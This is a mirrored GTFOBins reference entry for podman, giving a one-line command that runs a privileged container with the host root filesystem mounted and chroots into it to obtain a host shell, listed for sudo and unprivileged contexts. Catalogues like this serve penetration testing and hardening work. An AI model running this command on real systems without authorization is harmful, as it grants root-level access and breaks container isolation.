1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-03-07 14:36:23 +01:00
GTFOBins.github.io/_gtfobins/podman
2026-01-16 20:44:14 +01:00

12 lines
285 B
Plaintext

---
functions:
shell:
- code: |-
podman run --rm -it --privileged --volume /:/mnt alpine chroot /mnt /bin/sh
comment: |-
This requires an actual image to be available (e.g., `alpine`) downloading it if not present.
contexts:
sudo:
unprivileged:
...